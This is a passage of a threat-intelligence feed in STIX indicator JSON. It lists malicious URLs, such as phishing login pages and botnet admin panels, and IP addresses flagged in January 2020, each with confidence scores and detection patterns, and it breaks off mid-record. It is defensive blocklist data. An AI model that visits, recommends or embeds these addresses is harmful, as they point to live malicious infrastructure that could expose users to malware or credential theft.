CyberCrime","id":"indicator--232bdc34-44cb-4f41-af52-f6f1cd28818e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T02:58:16.318Z","name":"mal_url: http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/clap/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:16.318Z"} +{"created":"2020-01-24T02:58:16.358Z","description":"TS ID: 55250078027; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime","id":"indicator--4adabe80-3be4-401a-948a-f9724c872374","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-24T02:58:16.358Z","name":"mal_url: http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://thaubenuocngam.com/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T02:58:16.358Z"} +{"created":"2020-01-24T02:58:32.126Z","description":"TS ID: 55250078013; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--1d7051c0-a42b-4801-bd7f-f0abf2cc125c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:58:32.126Z","name":"mal_url: http://suspiciousactivity.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://suspiciousactivity.xyz/login']","type":"indicator","valid_from":"2020-01-24T02:58:32.126Z"} +{"created":"2020-01-24T02:58:37.603Z","description":"TS ID: 55250078017; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fb06856c-8aad-4fae-92fc-b73aae4f6dc7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:58:37.603Z","name":"mal_url: http://217.8.117.8/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.8.117.8/login']","type":"indicator","valid_from":"2020-01-24T02:58:37.603Z"} +{"created":"2020-01-24T02:58:37.643Z","description":"TS ID: 55250078012; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--33e674f5-a64a-48f4-9d8c-248348356135","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-01-24T02:58:37.643Z","name":"mal_url: http://f0387550.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387550.xsph.ru/login']","type":"indicator","valid_from":"2020-01-24T02:58:37.643Z"} +{"created":"2020-01-24T02:58:39.465Z","description":"TS ID: 55250078018; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--6311f539-1d5d-423f-a238-d0c1dc167432","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-24T02:58:39.465Z","name":"mal_url: http://lf4e4abf.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://lf4e4abf.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:58:39.465Z"} +{"created":"2020-01-24T02:59:02.031Z","description":"TS ID: 55250078033; iType: mal_ip; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1c91f219-cfa6-44c7-a5ee-1c760489b43c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T02:59:02.031Z","name":"mal_ip: 206.217.131.245","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '206.217.131.245']","type":"indicator","valid_from":"2020-01-24T02:59:02.031Z"} +{"created":"2020-01-24T02:59:15.878Z","description":"TS ID: 55250078010; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime","id":"indicator--c58983e2-18fd-47b8-aab4-6c8a2e2dcb35","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-01-24T02:59:15.878Z","name":"mal_url: http://67.215.224.101/a1/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://67.215.224.101/a1/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:59:15.878Z"} +{"created":"2020-01-24T02:59:29.155Z","description":"TS ID: 55250078000; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--1ab178a8-7991-4879-b9aa-8da49f40e92e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T02:59:29.155Z","name":"mal_ip: 162.241.73.163","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.241.73.163']","type":"indicator","valid_from":"2020-01-24T02:59:29.155Z"} +{"created":"2020-01-24T02:59:50.233Z","description":"TS ID: 55250078020; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--d5bdff38-6939-4a47-8e11-b910520565c4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-24T02:59:50.233Z","name":"mal_url: http://l60bdd58.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l60bdd58.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T02:59:50.233Z"} +{"created":"2020-01-24T02:59:50.255Z","description":"TS ID: 55250078009; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--1be74977-5aa6-4175-99dd-32b54863a06b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-25"],"modified":"2020-01-24T02:59:50.255Z","name":"mal_url: http://107.175.150.73/~giftioz/.azma/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://107.175.150.73/~giftioz/.azma/panel/admin.php']","type":"indicator","valid_from":"2020-01-24T02:59:50.255Z"} +{"created":"2020-01-24T02:59:52.536Z","description":"TS ID: 55250078023; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--eacc25ce-584c-4b40-98ab-7935dabd5cb1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-24T02:59:52.536Z","name":"mal_url: http://5.188.60.52/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.52/login']","type":"indicator","valid_from":"2020-01-24T02:59:52.536Z"} +{"created":"2020-01-24T02:59:54.784Z","description":"TS ID: 55250078025; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--504f4011-eaea-4921-aad5-f102bef7c798","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-24T02:59:54.784Z","name":"mal_url: http://trotdeiman.ga/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trotdeiman.ga/login']","type":"indicator","valid_from":"2020-01-24T02:59:54.784Z"} +{"created":"2020-01-24T02:59:54.815Z","description":"TS ID: 55250078014; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--e3ffb953-6c59-461a-8242-0d26c2b5c358","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-24T02:59:54.815Z","name":"mal_ip: 217.8.117.8","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.8']","type":"indicator","valid_from":"2020-01-24T02:59:54.815Z"} +{"created":"2020-01-24T03:00:01.726Z","description":"TS ID: 55250078036; iType: mal_ip; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--3a47ad46-930d-4ced-b0e7-dc9d0776153e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T03:00:01.726Z","name":"mal_ip: 104.223.170.113","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '104.223.170.113']","type":"indicator","valid_from":"2020-01-24T03:00:01.726Z"} +{"created":"2020-01-24T03:00:01.762Z","description":"TS ID: 55250078011; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--0e10924c-745c-4a58-8e27-ab3a6bacd666","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T03:00:01.762Z","name":"mal_url: http://tavim.org/includes/firmino/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tavim.org/includes/firmino/admin.php']","type":"indicator","valid_from":"2020-01-24T03:00:01.762Z"} +{"created":"2020-01-24T03:00:10.928Z","description":"TS ID: 55250078015; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--c3fb816a-cc3b-4442-be4d-d62113ae5168","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-24T03:00:10.928Z","name":"mal_url: http://onlinesecuritycenter.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://onlinesecuritycenter.xyz/login']","type":"indicator","valid_from":"2020-01-24T03:00:10.928Z"} +{"created":"2020-01-24T03:00:20.166Z","description":"TS ID: 55250078029; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime","id":"indicator--9159e46d-f3a4-464b-ac68-8beaf87e1a8f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-24T03:00:20.166Z","name":"mal_url: http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-24T03:00:20.166Z"} +{"created":"2020-01-24T03:00:24.048Z","description":"TS ID: 55250078016; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--fefa8e76-ae0f-41ab-84e7-ea43ab055573","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-24T03:00:24.048Z","name":"mal_url: http://jumbajumbadun.fun/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jumbajumbadun.fun/login']","type":"indicator","valid_from":"2020-01-24T03:00:24.048Z"} +{"created":"2020-01-24T03:00:55.816Z","description":"TS ID: 55250078024; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--6a76fa89-4d5f-40d0-9b03-671bdb2d5b4b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-58"],"modified":"2020-01-24T03:00:55.816Z","name":"mal_url: http://tavim.org/includes/salah/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tavim.org/includes/salah/admin.php']","type":"indicator","valid_from":"2020-01-24T03:00:55.816Z"} +{"created":"2020-01-24T03:01:10.501Z","description":"TS ID: 55250078022; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--21055dfd-d0cb-42ec-93bd-ffaeadd11d80","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-24T03:01:10.501Z","name":"mal_url: http://l0c23205.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l0c23205.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T03:01:10.501Z"} +{"created":"2020-01-24T03:01:10.518Z","description":"TS ID: 55250078021; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--7471a595-e8b0-4c41-be4c-0a3e55675630","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-24T03:01:10.518Z","name":"mal_url: http://l535e9e5.justinstalledpanel.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://l535e9e5.justinstalledpanel.com/login']","type":"indicator","valid_from":"2020-01-24T03:01:10.518Z"} +{"created":"2020-01-24T03:01:14.843Z","description":"TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-24T03:01:14.843Z","name":"mal_ip: 217.8.117.47","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '217.8.117.47']","type":"indicator","valid_from":"2020-01-24T03:01:14.843Z"} +{"created":"2020-01-25T02:57:12.699Z","description":"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:12.699Z","name":"mal_url: http://46.161.27.57/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.161.27.57/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:12.699Z"} +{"created":"2020-01-25T02:57:28.034Z","description":"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime","id":"indicator--54afbceb-72f3-484e-aee4-904f77beeff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-25T02:57:28.034Z","name":"mal_url: http://104.168.99.170/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.168.99.170/login']","type":"indicator","valid_from":"2020-01-25T02:57:28.034Z"} +{"created":"2020-01-25T02:57:38.187Z","description":"TS ID: 55253484356; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--da030e10-af9f-462d-bda8-33abb223e950","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:57:38.187Z","name":"mal_url: http://officelog.org/inc/js/jstree/scan/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/scan/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:57:38.187Z"} +{"created":"2020-01-25T02:57:38.214Z","description":"TS ID: 55253484343; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--d38e051a-bc5b-4723-884a-65e017d98299","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-65"],"modified":"2020-01-25T02:57:38.214Z","name":"mal_url: http://f0391587.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0391587.xsph.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:38.214Z"} +{"created":"2020-01-25T02:57:47.281Z","description":"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime","id":"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-25T02:57:47.281Z","name":"mal_url: http://46.161.27.57:8080/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.161.27.57:8080/northon/']","type":"indicator","valid_from":"2020-01-25T02:57:47.281Z"} +{"created":"2020-01-25T02:57:51.296Z","description":"TS ID: 55253484342; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b9715fd5-b89a-4859-b19f-55e052709227","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-25T02:57:51.296Z","name":"mal_url: http://f0393086.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0393086.xsph.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:51.296Z"} +{"created":"2020-01-25T02:57:56.007Z","description":"TS ID: 55253484363; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--e3177515-f481-46c8-bad8-582ba0858ef3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:57:56.007Z","name":"mal_url: http://insuncos.com/files1/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files1/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:57:56.007Z"} +{"created":"2020-01-25T02:57:56.044Z","description":"TS ID: 55253484339; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime","id":"indicator--33cdeaeb-5201-4fbb-b9ae-9c23377e7533","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:57:56.044Z","name":"mal_url: http://tg-h.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://tg-h.ru/login']","type":"indicator","valid_from":"2020-01-25T02:57:56.044Z"} +{"created":"2020-01-25T02:58:11.038Z","description":"TS ID: 55253484351; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--2baaa5f0-c2f6-4bd1-b59d-3a75931da735","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-25T02:58:11.038Z","name":"mal_url: http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-25T02:58:11.038Z"} +{"created":"2020-01-25T02:58:20.42Z","description":"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime","id":"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-64"],"modified":"2020-01-25T02:58:20.42Z","name":"mal_url: http://185.234.217.36/northon/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.234.217.36/northon/']","type":"indicator","valid_from":"2020-01-25T02:58:20.42Z"} +{"created":"2020-01-25T02:58:20.448Z","description":"TS ID: 55253484354; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime","id":"indicator--a173f4b1-67ce-44f8-a6d0-bd8a24e8c593","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-25T02:58:20.448Z","name":"mal_url: http://topik07.mcdir.ru/papka/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://topik07.mcdir.ru/papka/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:20.448Z"} +{"created":"2020-01-25T02:58:33.189Z","description":"TS ID: 55253484362; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--b53dded1-d293-4cd1-9e63-b6e0cbd850f0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:58:33.189Z","name":"mal_url: http://insuncos.com/files2/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files2/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:33.189Z"} +{"created":"2020-01-25T02:58:49.056Z","description":"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime","id":"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-47"],"modified":"2020-01-25T02:58:49.056Z","name":"mal_url: http://185.234.218.68/kaspersky/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185.234.218.68/kaspersky/']","type":"indicator","valid_from":"2020-01-25T02:58:49.056Z"} +{"created":"2020-01-25T02:58:59.472Z","description":"TS ID: 55253484357; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--f502199a-17a4-404b-a114-fb5eda28c32c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:58:59.472Z","name":"mal_url: http://officelog.org/inc/js/jstree/mh/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/mh/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:58:59.472Z"} +{"created":"2020-01-25T02:59:27.07Z","description":"TS ID: 55253484359; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--af7422eb-5d8e-4878-bdd1-395313434dae","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:59:27.07Z","name":"mal_url: http://officelog.org/inc/js/jstree/ch/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/ch/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:27.07Z"} +{"created":"2020-01-25T02:59:28.967Z","description":"TS ID: 55253484358; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--71b36c05-86dd-4685-81c0-5a99e2e14c23","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T02:59:28.967Z","name":"mal_url: http://officelog.org/inc/js/jstree/dar/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/dar/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:28.967Z"} +{"created":"2020-01-25T02:59:37.661Z","description":"TS ID: 55253484352; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--9d948509-dfb4-45b6-b8bc-780df88a213f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-25T02:59:37.661Z","name":"mal_url: http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-25T02:59:37.661Z"} +{"created":"2020-01-25T02:59:37.692Z","description":"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--9f613f8e-2040-4eee-8044-044023a8093e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-01-25T02:59:37.692Z","name":"mal_ip: 192.64.118.56","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.64.118.56']","type":"indicator","valid_from":"2020-01-25T02:59:37.692Z"} +{"created":"2020-01-25T02:59:54.296Z","description":"TS ID: 55253484361; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--518c3959-6c26-413f-9a5f-c8f76d86185a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-25T02:59:54.296Z","name":"mal_url: http://insuncos.com/files3/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://insuncos.com/files3/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T02:59:54.296Z"} +{"created":"2020-01-25T02:59:57.748Z","description":"TS ID: 55253484347; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime","id":"indicator--625b94ec-2304-4502-a2eb-59d52cdb9c1f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-80"],"modified":"2020-01-25T02:59:57.748Z","name":"mal_url: http://t95212tt.beget.tech/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://t95212tt.beget.tech/login']","type":"indicator","valid_from":"2020-01-25T02:59:57.748Z"} +{"created":"2020-01-25T03:00:22.168Z","description":"TS ID: 55253484349; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--c8f76b97-051f-4fab-b57f-a57f37480aa0","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-90"],"modified":"2020-01-25T03:00:22.168Z","name":"mal_url: http://kiototan.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kiototan.site/login']","type":"indicator","valid_from":"2020-01-25T03:00:22.168Z"} +{"created":"2020-01-25T03:00:27.279Z","description":"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-25T03:00:27.279Z","name":"mal_ip: 176.107.160.43","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '176.107.160.43']","type":"indicator","valid_from":"2020-01-25T03:00:27.279Z"} +{"created":"2020-01-25T03:00:29.248Z","description":"TS ID: 55253484340; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--72334129-8d1c-4cac-bde6-2d5d6316e266","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-25T03:00:29.248Z","name":"mal_url: http://newfoundfriend.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://newfoundfriend.xyz/login']","type":"indicator","valid_from":"2020-01-25T03:00:29.248Z"} +{"created":"2020-01-25T03:01:03.628Z","description":"TS ID: 55253484360; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--a3f8f1e3-77c5-442d-a918-5d3d800a8357","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T03:01:03.628Z","name":"mal_url: http://officelog.org/inc/js/jstree/bi/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/bi/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T03:01:03.628Z"} +{"created":"2020-01-25T03:01:03.65Z","description":"TS ID: 55253484355; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--49bac194-cefe-4c31-81eb-cc81a3a3bb26","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T03:01:03.65Z","name":"mal_url: http://officelog.org/inc/js/jstree/vic/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/vic/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T03:01:03.65Z"} +{"created":"2020-01-26T02:54:41.651Z","description":"TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:54:41.651Z","name":"mal_url: http://45.139.236.48/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.139.236.48/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.651Z"} +{"created":"2020-01-26T02:54:41.675Z","description":"TS ID: 55256890149; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--3e082be1-f6be-45f6-811b-5e63e2a596c5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-26T02:54:41.675Z","name":"mal_url: http://privatepp.club/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://privatepp.club/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.675Z"} +{"created":"2020-01-26T02:54:41.705Z","description":"TS ID: 55256890147; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--95774d83-e0e1-45e4-ab1c-1bb27588fa92","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-26T02:54:41.705Z","name":"mal_url: 